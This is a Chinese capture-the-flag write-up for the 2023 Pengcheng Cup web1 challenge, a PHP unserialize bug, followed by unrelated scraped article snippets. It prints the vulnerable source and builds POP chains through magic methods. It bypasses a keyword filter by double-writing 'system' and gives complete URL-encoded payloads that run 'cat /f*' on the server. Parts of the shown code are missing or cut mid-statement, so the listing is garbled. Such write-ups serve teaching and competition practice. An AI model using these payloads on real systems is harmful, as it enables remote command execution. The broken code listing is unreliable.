文大。
文大。

【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)

考点:

常规的PHP反序列化漏洞+双写绕过waf 签到题

源码:

hacker->name;
        return "";
    }
}
class C
{
    public $finish;
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
class E
{
    public $hacker;

    public  function __invoke($parms1)
    {
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username="admin";
    public function __destruct()
    {
        $this->welcome();

    }
    public  function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}

class K
{
    public $func;
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}

class R
{
    private $method;
    private $args;

    public  function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}

function nonono($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$a = $_POST["pop"];
if (isset($a)){
    unserialize(nonono($a));
}
?>

代码审计:

入口肯定是H. __destruct()魔术方法进去,然后这里就涉及到下一步tostring()魔术方法的触发 ,但是这里涉及两个tostring()方法 然后这里就有个非预期解

非预期解:

 POP链:H.destruct()->Hacker.tostring()

代码构造:

username = new Hacker();
echo urlencode(serialize($a));

payload:

O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A6%3A%22Hacker%22%3A2%3A%7Bs%3A11%3A%22%00Hacker%00exp%22%3BN%3Bs%3A11%3A%22%00Hacker%00cmd%22%3BN%3B%7D%7D

可以得到flag 

预期解:

 我们触发A.tostring()的魔术方法, 找到到出口call_user_func_array(),然后一步一步触发下面的魔术方法

POP链:

H.destruct()->A.tostring()->C.get()->K.call()->E.invoke()->R.welcome()

 代码构造:

key = true;  //ture 设为真才能进入if语句
        @$this->finish1->name = true; //ture 设为真才能进入if语句;@。当将其放置在一个 PHP 表达式之前,该表达式可能产生的任何错误信息都被忽略掉。
        @$this->finish->finish = true;//ture 设为真才能进入if语句
        $this->method = "system";   //这个会被ban
        $this->args = array("cat /f*"); // 下面这个就是构造命令执行 只有设为数组是因为这里要知道call_user_func()函数如果传入的参数是array类型的话,会将数组的成员当做类名和方法
    }
}

$h = new H();
$h->username = new A();
$h->username->hacker = new C();
$h->username->hacker->finish = new K();
$h->username->hacker->finish->func = new E();
$h->username->hacker->finish->func->hacker = new R();
$s = serialize($h);
$s = preg_replace("/system/", "syssystemtem", $s); //对system进行双写绕过

echo urlencode($s);

【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)_第1张图片

payload;

O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A6%3A%22finish%22%3BO%3A1%3A%22K%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A1%3A%22E%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22R%22%3A5%3A%7Bs%3A9%3A%22%00R%00method%22%3Bs%3A6%3A%22syssystemtem%22%3Bs%3A7%3A%22%00R%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22cat+%2Ff%2A%22%3B%7Ds%3A3%3A%22key%22%3Bb%3A1%3Bs%3A7%3A%22finish1%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bb%3A1%3B%7Ds%3A6%3A%22finish%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22finish%22%3Bb%3A1%3B%7D%7D%7D%7D%7D%7D%7D

得到flag

你可能感兴趣的:(反序列化漏洞,CTF,CTF,web安全,PHP反序列化漏洞)

  • SWING HACKS电子书及范例代码 CY20080125 swingswinghacks
    SWINGHACKS电子书及范例代码购书地址:http://www.oreilly.com.cn/index.php?func=book&isbn=978-7-302-14334-5介绍Java编程语言一般是和重要的企业级应用程序联系在一起的,运行它们的服务器可能就位于蒙大拿的某个冰冷的机房里。不过,是桌面应用催生了Java,未来也必将是桌面应用让Java能更加光彩夺目。通过AWT和现在的Swin
  • PyPI仓库 loggutils 组件内嵌恶意代码
    【高危】PyPI仓库loggutils组件内嵌恶意代码漏洞描述当用户安装受影响版本的loggutilsPython组件包时会窃取用户主机浏览器、剪贴板、系统文件等信息,并窃取键盘记录和摄像头截图,并对用户主机进行远控。MPS编号MPS-tzsc-gm4v处置建议强烈建议修复发现时间2025-06-30投毒仓库pip投毒类型恶意代码利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本log
  • NPM组件 betsson 等窃取主机敏感信息 墨菲安全 npm前端node.jsNPM组件投毒软件供应链安全主机信息窃取
    【高危】NPM组件betsson等窃取主机敏感信息漏洞描述当用户安装受影响版本的betsson组件包时会窃取用户的主机名、用户名、工作目录、IP地址等信息并发送到攻击者可控的服务器地址。MPS编号MPS-2nrw-lifd处置建议强烈建议修复发现时间2025-06-30投毒仓库npm投毒类型主机信息收集利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本betsson[1.0.0,99.
  • 基于uniapp微信小程+SpringBoot+Vue的流浪动物救助领养系统设计和实现(源码+论文+部署讲解等)
    博主介绍:✌全网粉丝50W+,csdn特邀作者、博客专家、CSDN新星计划导师、Java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和学生毕业项目实战,高校老师/讲师/同行前辈交流✌技术范围:SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等
  • Web学习:SQL注入之联合查询注入 kaikaile1995 前端学习sql
    SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。本文将深入探讨SQL注入的一个重要变种——联合查询注入(Union-basedSQLInjection),介绍其原理、常见攻击方式、以及防御措施。SQL注入概述SQL注入是指将恶意的SQL代码插入到应用程序的输入字段中,使得这些代码被意外
  • 第 3 周:Fiber 架构原理(调和流程) longhuxiu 架构
    目标:理解beginWork、completeWork的作用搞懂调和的核心流程推荐文件:ReactFiberBeginWork.jsReactFiberCompleteWork.jsReactChildFiber.js理解beginWork、completeWork的作用在React源码中,beginWork和completeWork是调和(reconciliation)阶段的核心函数,它们构成了
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) 寒蝉听雨[原ID_PowerShell] [靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
  • js 允许生成特殊的变量名 基于字符集编码混淆的 XSS 绕过漏洞 -- Google 2025 Lost In Transliteration A5rZ 网络安全
    题目实现了一个字符转换工具在/file路由用户可以通过ct参数自定义Content-Type//文件路由-提供静态文件服务(JS和CSS),支持内容类型验证app.MapGet("/file",(stringfilename="",string?ct=null,string?q=null)=>{//根据文件名查找对应的模板文件string?template=FindFile(filename);i
  • 揭秘网络安全:数字世界的隐形防线
    目录一、网络安全:数字时代的关键锁钥二、常见网络安全威胁大起底2.1网络诈骗:狡猾的数字陷阱2.2恶意软件:隐匿的数字刺客2.3数据泄露:隐私的无声暴露2.4网络钓鱼:伪装的数字猎手三、筑牢网络安全防线的策略3.1提升安全意识:思想上的防火墙3.2强化密码管理:账户的坚固盾牌3.3谨慎使用公共网络:公共场合的安全警惕3.4定期更新软件和系统:修复漏洞的及时补丁3.5开启防护工具:数字世界的安全卫士
  • PHP爬虫实战指南:获取淘宝商品详情 爬虫程序猿 php爬虫android
    在电商领域,淘宝作为中国最大的在线零售平台之一,拥有海量的商品信息。对于开发者、市场分析师以及电商研究者来说,能够从淘宝获取商品详情信息,对于市场分析、价格比较、商品推荐等应用场景具有重要价值。本文将详细介绍如何使用PHP编写爬虫程序,以合法合规的方式获取淘宝商品的详情信息,并提供详细的代码示例。一、准备工作(一)注册淘宝开放平台账号在使用淘宝API之前,需要在淘宝开放平台注册账号并创建应用。注册
  • 如何使用 PHP 接入港股实时行情接口(WebSocket 实时K线+盘口) quant_1986 php开发语言网络协议websocket后端经验分享笔记
    在构建金融类网站或量化交易系统时,实时行情数据是不可或缺的核心组件之一。尤其是对港股市场感兴趣的开发者,更需要一个可靠且实时的行情源。本文将介绍如何使用PHP接入港股行情接口,并实现实时接收1分钟K线数据。准备工作首先,确保你的开发环境中安装了Composer。我们将使用PHP的WebSocket客户端库textalk/websocket。composerrequiretextalk/websoc
  • php artisan route:list | grep admin到底是干什么的?使用场景是什么?底层原理是什么? 快点好好学习吧 Laravelphplistandroid
    phpartisanroute:list|grepadmin全解析:从命令到内核实现一、命令拆解与作用这个命令组合用于筛选并显示Laravel应用中包含admin关键字的路由:phpartisanroute:list功能:列出应用中所有注册的路由(包括URI、控制器、中间件等信息)输出示例:+--------+----------+-------------------+-------------
  • 页面弹窗≠有效漏洞:揭秘 XSS 中的沙箱与子域名隔离 vortex5 web安全xss安全前端
    前言跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的安全漏洞,攻击者通过将恶意脚本注入到看似安全可靠的网站中,影响其他用户的正常使用。假设你使用了一个简单的XSS有效载荷,比如alert(1),它会在执行时弹出一个窗口。虽然这个弹窗能直观地告诉你代码被触发,但它无法准确揭示一个关键信息:有效载荷究竟是在哪里执行的?相比之下,使用alert(document.domai
  • AI编程工具深度对比:腾讯云代码助手CodeBuddy、Cursor与通义灵码 scuter_yu AI编程云计算
    腾讯云代码助手CodeBuddy智能代码补全:基于上下文和编辑行为预测代码,支持行内补全、函数块生成及注释转代码,覆盖200+编程语言和框架,可减少70%以上的键盘输入。Craft智能体:支持自然语言驱动的多文件协同开发,能自动拆解任务并生成关联页面代码,还支持从用户需求转到研发需求,最后拆分成迭代执行。代码评审与优化:从代码规范性、性能优化、安全漏洞等多个维度对代码进行全面审查,生成详细报告并提
  • $.post 上传文件_基于 Laravel + Vue 组件实现文件异步上传 Clever Liu $.post上传文件
    我们在上一篇教程中已经演示了如何通过Request请求实例获取各种文本输入数据,但是还有一种输入数据我们没有涉及到,那就是文件上传。我们可以通过Request请求实例提供的file方法获取用户上传文件,并将其保存到指定目录从而完成文件上传,接下来,我们将从前端到后端实现一个完整的用户上传文件功能,包括视图、路由、控制器部分代码。定义文件上传路由首先我们在routes/web.php中定义上传文件涉
  • 数据库Mysql基础------第一部分 数据的准备与基础命令 Judy~judy 数据库数据库mysql
    一、初识数据库一、为什么要用数据库?数据库(Database)是按照数据结构来组织、存储和管理数据的仓库数据库随时随地的存在,并且使用,简单的说,数据库就是收集数据的结构。数据涉及很多,例如一个产品属于种类,并且有自己的数据标签,这就是为什么要用关系型数据。在关系数据库,我们建模数据包括产品,品类,标签等等,所有这些都用一个表格,包含行和列,就像Excel中的电子表格。从文件中读取数据的反序列化操
  • PHP学习笔记(十二)
    访问控制(可见性)对属性或方法的访问控制(PHP7.1后支持常量),是通过在前面添加关键字public(公有)、protected、private来实现。公有的任意可见,受保护的可被自身及其子类和父类访问,私有的只能被其定义所在的类访问属性的访问控制类属性可以定义为public,private或者protected。在没有任何访问控制关键字的情况下,属性声明为public不对称属性可见性从PHP8
  • 植物small RNA靶基因预测软件,psRobot Bioinfo科研生信筆記 生物信息学科研绘图psRotosmallRNAmiRNA靶基因预测
    psRoto软件安装网址http://omicslab.genetics.ac.cn/psRobot/downloads.php下载和安装wgethttp://omicslab.genetics.ac.cn/psRobot/program/WebServer/psRobot_v1.2.tar.gz#tar-zxvfpsRobot_v1.2.tar.gz#cdpsRobot_v1.2##./conf
  • PHP语法基础篇(五):流程控制 zorro_z php手记实战php
    任何PHP脚本都是由一系列语句构成的。一条语句可以是一个赋值语句,一个函数调用,一个循环,一个条件语句或者甚至是一个什么也不做的语句(空语句)。语句通常以分号结束。此外,还可以用花括号将一组语句封装成一个语句组。语句组本身可以当作是一行语句。本篇文章将记录流程控制的学习过程。目录一、条件语句1、if语句2、if...else语句3、if...elseif...else语句4、switch语句4.1
  • PHP基础语法讲解 程序员小羊! 杂文php
    大家好,我是程序员小羊!前言:PHP(HypertextPreprocessor)是一种常用于网页开发的服务器端脚本语言,易于学习并且与HTML紧密结合。以下是PHP的基础语法详细讲解。1.PHP基础结构1.1PHP脚本结构PHP代码通常嵌入到HTML文件中,并且用特殊的标记或短标记包围:是结束标记。PHP代码可以放在HTML代码中间,服务器解析时只执行PHP代码,输出结果会生成标准HTML页面。
  • 网络安全等级保护(等保)全面指南 兢谨网安 企业安全web安全网络安全渗透测试网络安全网络攻击模型
    一、等保核心认知1.等保定义与法律地位定义:等保是国家对信息系统按重要性分级保护的基础制度,涵盖定级、备案、建设整改、测评、检查五个阶段。法律强制:《网络安全法》第21条明确要求网络运营者履行等保义务,违者最高罚款100万元(单位)及10万元(责任人)。2.甲方核心价值合规避险:金融、医疗、教育等行业监管明确要求等保资质(如支付系统需二级以上)。风险管控:通过年检式测评(三级每年1次)发现漏洞,避
  • 【蓝队】XX集团股份有限公司体系化监测挖掘抵御0day漏洞防护技战法|护网|高级|研判|监测|hw chenyzzz 蓝队网络安全网络安全系统安全web安全安全架构0day
    2025重点关注MetaCRM客户关系管理系统sendfile.jsp任意文件上传MetaCRM客户关系管理系统sendsms.jsp任意文件上传AgentSyste代理商管理系统login.actionStruts2远程代码执行用友NClistUserSharingEvents存在SQL注入浪潮云财务系统存在远程代码执行一、工作背景与现状分析0day漏洞是指尚未被漏洞所在软硬件系统的厂商或开发者
  • 【thinkphp5】Session和Cache记录微信accesstoken hj1043 fastadminPHP微信java开发语言
    记录一个项目实际遇到的坑,不要把token存放在session,要存在在cache里面!!因为Session并不能设置expire过期时间,Session::set()方法第三个参数是作用域,而非过期时间!!!因此不能混用cache的用法。session的set方法/***session设置*@paramstring$namesession名称*@parammixed$valuesession值*
  • 设计模式:工厂模式 (简单工厂、工厂方法、抽象工厂) 案例详解 码农小灰 面试题java设计模式设计模式
    目录一、引言:为什么需要工厂模式?二、简单工厂模式(SimpleFactory)1.核心思想2.代码示例3.优点与缺点4.适用场景三、工厂方法模式(FactoryMethod)1.核心思想2.代码示例3.优点与缺点4.适用场景四、抽象工厂模式(AbstractFactory)1.核心思想2.代码示例3.优点与缺点4.适用场景五、对比与选择建议六、进阶技巧与注意事项七、总结一、引言:为什么需要工厂模
  • ThinkPHP6.0 如何使用日志 小叔哥哥 问题PHPthinkphp
    日志遵循PSR-3规范,除非是实时写入的日志,其它日志都是在当前请求结束的时候统一写入的所以不要在日志写入之后使用exit等中断操作会导致日志写入失败。一.写入日志的几种方法1.助手函数trace/***记录日志信息*@parammixed$loglog信息支持字符串和数组*@paramstring$level日志级别(error/info/notice)*@returnarray|void*/t
  • ThinkPHP 6 数据库查询,where 、or、and 小叔哥哥 PHPthinkphp
    1.查询数据库的方式三种数据库查询(Db类)Db::name()->where()->select()实例化模型查询(建立模型model)$userModel=newuserModel();$userModel->where()->select()使用查询构造器(调用数据库链式操作和查询方法)UserModel::where()->select()俩种查询方式返回的数据格式也不一样。一种是数组,一
  • 揭秘代码的安全漏洞是如何被发现的:代码扫描工具fortify的详细介绍 G探险者 javajavafortify漏洞扫描
    前言在许多对安全性有所关注的公司中,代码安全扫描已成为一项关键的实践。但是,面对频繁出现的安全漏洞升级,大家可能会感到困惑和头疼。那么,这些令人不安的漏洞究竟是如何被发现的呢?今天我们将为大家揭示安全漏洞发现的奥秘。fortify概述Fortify是一款广泛使用的静态应用程序安全测试(SAST)工具,由MicroFocus开发和维护。用Java语言开发的。具有良好的跨平台兼容性,可以支持多种操作系
  • 【代码审计】安全审核常见漏洞修复策略 秋说 Java代码审计网络安全代码审计
    文章目录1.异常信息泄露修复建议不推荐用法推荐用法2.文件上传漏洞错误示例(缺乏校验)安全示例(含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击)错误示例(存在风险)安全示例(自动转义)修复建议7.接口未鉴权修复建议8.路径遍历漏洞错误示例
  • Mac电脑 医学绘图 Graphpad Prism 2501_92604878 macosmac医学绘图
    GraphPadPrismMac是一款功能强大、易于使用的科学和统计分析工具,适用于各种类型的数据处理和可视化需求。无论您是进行基础研究、临床试验还是学术写作,GraphPadPrismMac都能为您短时间内做出最合适的分析选择,并优雅地绘制和展示您的作品。原文地址:GraphpadPrismMac医学绘图
  • php7 取余,PHP7中对大数求余报错Uncaught DivisionByZeroError: Modulo by zero 奶油冰糖葫芦 php7取余
    一、问题描述今天在使用PHP中的求余的时候,发现了一个“很怪异的事”,在PHP中执行如下代码echo2%pow(2,32);既然报错:PHPFatalerror:UncaughtDivisionByZeroError:ModulobyzeroinCommandlinecode:1Stacktrace:#0{main}throwninCommandlinecodeonline1Fatalerror:
  • redis学习笔记——不仅仅是存取数据 Everyday都不同 returnSourceexpire/delincr/lpush数据库分区redis
    最近项目中用到比较多redis,感觉之前对它一直局限于get/set数据的层面。其实作为一个强大的NoSql数据库产品,如果好好利用它,会带来很多意想不到的效果。(因为我搞java,所以就从jedis的角度来补充一点东西吧。PS:不一定全,只是个人理解,不喜勿喷)   1、关于JedisPool.returnSource(Jedis jeids)   这个方法是从red
  • SQL性能优化-持续更新中。。。。。。 atongyeye oraclesql
    1 通过ROWID访问表--索引 你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高. 2 共享SQL语句--相同的sql放入缓存 3 选择最有效率的表
  • [JAVA语言]JAVA虚拟机对底层硬件的操控还不完善 comsci JAVA虚拟机
         如果我们用汇编语言编写一个直接读写CPU寄存器的代码段,然后利用这个代码段去控制被操作系统屏蔽的硬件资源,这对于JVM虚拟机显然是不合法的,对操作系统来讲,这样也是不合法的,但是如果是一个工程项目的确需要这样做,合同已经签了,我们又不能够这样做,怎么办呢? 那么一个精通汇编语言的那种X客,是否在这个时候就会发生某种至关重要的作用呢? &n
  • lvs- real 男人50 LVS
    #!/bin/bash # # Script to start LVS DR real server. # description: LVS DR real server # #.  /etc/rc.d/init.d/functions VIP=10.10.6.252 host='/bin/hostname' case "$1" in sta
  • 生成公钥和私钥 oloz DSA安全加密
    package com.msserver.core.util; import java.security.KeyPair; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; public class SecurityUtil {
  • UIView 中加入的cocos2d,背景透明 374016526 cocos2dglClearColor
    要点是首先pixelFormat:kEAGLColorFormatRGBA8,必须有alpha层才能透明。然后view设置为透明glView.opaque = NO;[director setOpenGLView:glView];[self.viewController.view setBackgroundColor:[UIColor clearColor]];[self.viewControll
  • mysql常用命令 香水浓 mysql
    连接数据库 mysql -u troy -ptroy 备份表 mysqldump -u troy -ptroy mm_database mm_user_tbl > user.sql 恢复表(与恢复数据库命令相同) mysql -u troy -ptroy mm_database < user.sql 备份数据库 mysqldump -u troy -ptroy
  • 我的架构经验系列文章 - 后端架构 - 系统层面 agevs JavaScriptjquerycsshtml5
    系统层面: 高可用性 所谓高可用性也就是通过避免单独故障加上快速故障转移实现一旦某台物理服务器出现故障能实现故障快速恢复。一般来说,可以采用两种方式,如果可以做业务可以做负载均衡则通过负载均衡实现集群,然后针对每一台服务器进行监控,一旦发生故障则从集群中移除;如果业务只能有单点入口那么可以通过实现Standby机加上虚拟IP机制,实现Active机在出现故障之后虚拟IP转移到Standby的快速
  • 利用ant进行远程tomcat部署 aijuans tomcat
    在javaEE项目中,需要将工程部署到远程服务器上,如果部署的频率比较高,手动部署的方式就比较麻烦,可以利用Ant工具实现快捷的部署。这篇博文详细介绍了ant配置的步骤(http://www.cnblogs.com/GloriousOnion/archive/2012/12/18/2822817.html),但是在tomcat7以上不适用,需要修改配置,具体如下: 1.配置tomcat的用户角色
  • 获取复利总收入 baalwolf 获取
           public static void main(String args[]){         int money=200;         int year=1;         double rate=0.1; &
  • eclipse.ini解释 BigBird2012 eclipse
    大多数java开发者使用的都是eclipse,今天感兴趣去eclipse官网搜了一下eclipse.ini的配置,供大家参考,我会把关键的部分给大家用中文解释一下。还是推荐有问题不会直接搜谷歌,看官方文档,这样我们会知道问题的真面目是什么,对问题也有一个全面清晰的认识。 Overview 1、Eclipse.ini的作用 Eclipse startup is controlled by th
  • AngularJS实现分页功能 bijian1013 JavaScriptAngularJS分页
            对于大多数web应用来说显示项目列表是一种很常见的任务。通常情况下,我们的数据会比较多,无法很好地显示在单个页面中。在这种情况下,我们需要把数据以页的方式来展示,同时带有转到上一页和下一页的功能。既然在整个应用中这是一种很常见的需求,那么把这一功能抽象成一个通用的、可复用的分页(Paginator)服务是很有意义的。   &nbs
  • [Maven学习笔记三]Maven archetype bit1129 ArcheType
    archetype的英文意思是原型,Maven archetype表示创建Maven模块的模版,比如创建web项目,创建Spring项目等等.   mvn archetype提供了一种命令行交互式创建Maven项目或者模块的方式,   mvn archetype   1.在LearnMaven-ch03目录下,执行命令mvn archetype:gener
  • 【Java命令三】jps bit1129 Java命令
    jps很简单,用于显示当前运行的Java进程,也可以连接到远程服务器去查看   [hadoop@hadoop bin]$ jps -help usage: jps [-help] jps [-q] [-mlvV] [<hostid>] Definitions: <hostid>: <hostname>[:
  • ZABBIX2.2 2.4 等各版本之间的兼容性 ronin47
    zabbix更新很快,从2009年到现在已经更新多个版本,为了使用更多zabbix的新特性,随之而来的便是升级版本,zabbix版本兼容性是必须优先考虑的一点 客户端AGENT兼容 zabbix1.x到zabbix2.x的所有agent都兼容zabbix server2.4:如果你升级zabbix server,客户端是可以不做任何改变,除非你想使用agent的一些新特性。 Zabbix代理(p
  • unity 3d还是cocos2dx哪个适合游戏? brotherlamp unity自学unity教程unity视频unity资料unity
    unity 3d还是cocos2dx哪个适合游戏? 问:unity 3d还是cocos2dx哪个适合游戏? 答:首先目前来看unity视频教程因为是3d引擎,目前对2d支持并不完善,unity 3d 目前做2d普遍两种思路,一种是正交相机,3d画面2d视角,另一种是通过一些插件,动态创建mesh来绘制图形单元目前用的较多的是2d toolkit,ex2d,smooth moves,sm2,
  • 百度笔试题:一个已经排序好的很大的数组,现在给它划分成m段,每段长度不定,段长最长为k,然后段内打乱顺序,请设计一个算法对其进行重新排序 bylijinnan java算法面试百度招聘
    import java.util.Arrays; /** * 最早是在陈利人老师的微博看到这道题: * #面试题#An array with n elements which is K most sorted,就是每个element的初始位置和它最终的排序后的位置的距离不超过常数K * 设计一个排序算法。It should be faster than O(n*lgn)。
  • 获取checkbox复选框的值 chiangfai checkbox
    <title>CheckBox</title> <script type = "text/javascript"> doGetVal: function doGetVal() { //var fruitName = document.getElementById("apple").value;//根据
  • MySQLdb用户指南 chenchao051 mysqldb
    原网页被墙,放这里备用。 MySQLdb User's Guide Contents Introduction Installation _mysql MySQL C API translation MySQL C API function mapping Some _mysql examples MySQLdb
  • HIVE 窗口及分析函数 daizj hive窗口函数分析函数
    窗口函数应用场景: (1)用于分区排序 (2)动态Group By (3)Top N (4)累计计算 (5)层次查询 一、分析函数 用于等级、百分点、n分片等。 函数             说明 RANK()     &nbs
  • PHP ZipArchive 实现压缩解压Zip文件 dcj3sjt126com PHPzip
    PHP ZipArchive 是PHP自带的扩展类,可以轻松实现ZIP文件的压缩和解压,使用前首先要确保PHP ZIP 扩展已经开启,具体开启方法就不说了,不同的平台开启PHP扩增的方法网上都有,如有疑问欢迎交流。这里整理一下常用的示例供参考。 一、解压缩zip文件 01 02 03 04 05 06 07 08 09 10 11
  • 精彩英语贺词 dcj3sjt126com 英语
    I'm always here              我会一直在这里支持你                &nb
  • 基于Java注解的Spring的IoC功能 e200702084 javaspringbeanIOCOffice
                                      
  • java模拟post请求 geeksun java
    一般API接收客户端(比如网页、APP或其他应用服务)的请求,但在测试时需要模拟来自外界的请求,经探索,使用HttpComponentshttpClient可模拟Post提交请求。 此处用HttpComponents的httpclient来完成使命。 import org.apache.http.HttpEntity ; import org.apache.http.HttpRespon
  • Swift语法之 ---- ?和!区别 hongtoushizi ?swift!
    转载自: http://blog.sina.com.cn/s/blog_71715bf80102ux3v.html   Swift语言使用var定义变量,但和别的语言不同,Swift里不会自动给变量赋初始值,也就是说变量不会有默认值,所以要求使用变量之前必须要对其初始化。如果在使用变量之前不进行初始化就会报错: var stringValue : String //
  • centos7安装jdk1.7 jisonami jdkcentos
    安装JDK1.7 步骤1、解压tar包在当前目录 [root@localhost usr]#tar -xzvf jdk-7u75-linux-x64.tar.gz 步骤2:配置环境变量 在etc/profile文件下添加 export JAVA_HOME=/usr/java/jdk1.7.0_75 export CLASSPATH=/usr/java/jdk1.7.0_75/lib
  • 数据源架构模式之数据映射器 home198979 PHP架构数据映射器datamapper
    前面分别介绍了数据源架构模式之表数据入口、数据源架构模式之行和数据入口数据源架构模式之活动记录,相较于这三种数据源架构模式,数据映射器显得更加“高大上”。   一、概念 数据映射器(Data Mapper):在保持对象和数据库(以及映射器本身)彼此独立的情况下,在二者之间移动数据的一个映射器层。概念永远都是抽象的,简单的说,数据映射器就是一个负责将数据映射到对象的类数据。 &nb
  • 在Python中使用MYSQL pda158 mysqlpython
    缘由   近期在折腾一个小东西须要抓取网上的页面。然后进行解析。将结果放到 数据库中。   了解到 Python在这方面有优势,便选用之。   由于我有台 server上面安装有 mysql,自然使用之。在进行数据库的这个操作过程中遇到了不少问题,这里 记录一下,大家共勉。    python中mysql的调用    百度之后能够通过MySQLdb进行数据库操作。
  • 单例模式 hxl1988_0311 java单例设计模式单件
    package com.sosop.designpattern.singleton; /* * 单件模式:保证一个类必须只有一个实例,并提供全局的访问点 * * 所以单例模式必须有私有的构造器,没有私有构造器根本不用谈单件 * * 必须考虑到并发情况下创建了多个实例对象 * */ /** * 虽然有锁,但是只在第一次创建对象的时候加锁,并发时不会存在效率
  • 27种迹象显示你应该辞掉程序员的工作 vipshichg 工作
    1、你仍然在等待老板在2010年答应的要提拔你的暗示。 2、你的上级近10年没有开发过任何代码。 3、老板假装懂你说的这些技术,但实际上他完全不知道你在说什么。 4、你干完的项目6个月后才部署到现场服务器上。 5、时不时的,老板在检查你刚刚完成的工作时,要求按新想法重新开发。 6、而最终这个软件只有12个用户。 7、时间全浪费在办公室政治中,而不是用在开发好的软件上。 8、部署前5分钟才开始测试。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他